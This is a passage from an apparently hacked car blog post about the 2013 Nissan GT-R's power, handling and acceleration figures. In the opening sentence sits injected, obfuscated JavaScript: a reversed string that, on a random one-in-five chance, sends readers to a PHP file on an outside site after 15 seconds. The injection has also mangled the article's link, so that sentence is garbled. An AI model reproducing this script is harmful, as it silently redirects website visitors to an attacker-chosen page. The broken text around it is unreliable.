Now we wouldn’t want $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/nissan-juke-r-into-production-yes-really/” target=”_blank”>the new production ready Juke-R to steal all the limelight, would we?! So when we consider the ‘improved response, better stability and sharper handling’ of the new-for-2013 Nissan GT-R, clearly that means a boatload of new and improved features tucked safely under the bonnet.
Ah…
Well so far we have the same 3.8-litre twin-turbo V6 and pretty much the same growling aesthetics (well, Hollywood discovered back in 1998 that when you change the look of Godzilla, your email inbox gets flooded VERY quickly).
The difference? Well that would be the new 542hp figure, a full [cough] 12hp more than the MY12 GT-R. That, plus revised suspension, new injectors and reconfigured turbocharger valves (oh, and a reinforced dash panel), mean a 0-100s time a full 0.1s faster than before (that’s 2.7 seconds, just FYI).
Apparently, if you’ve got a clear track and bracing tailwind, that should produce a balls-out run around the Nurburgring some three seconds faster than the MY12 GT-R.
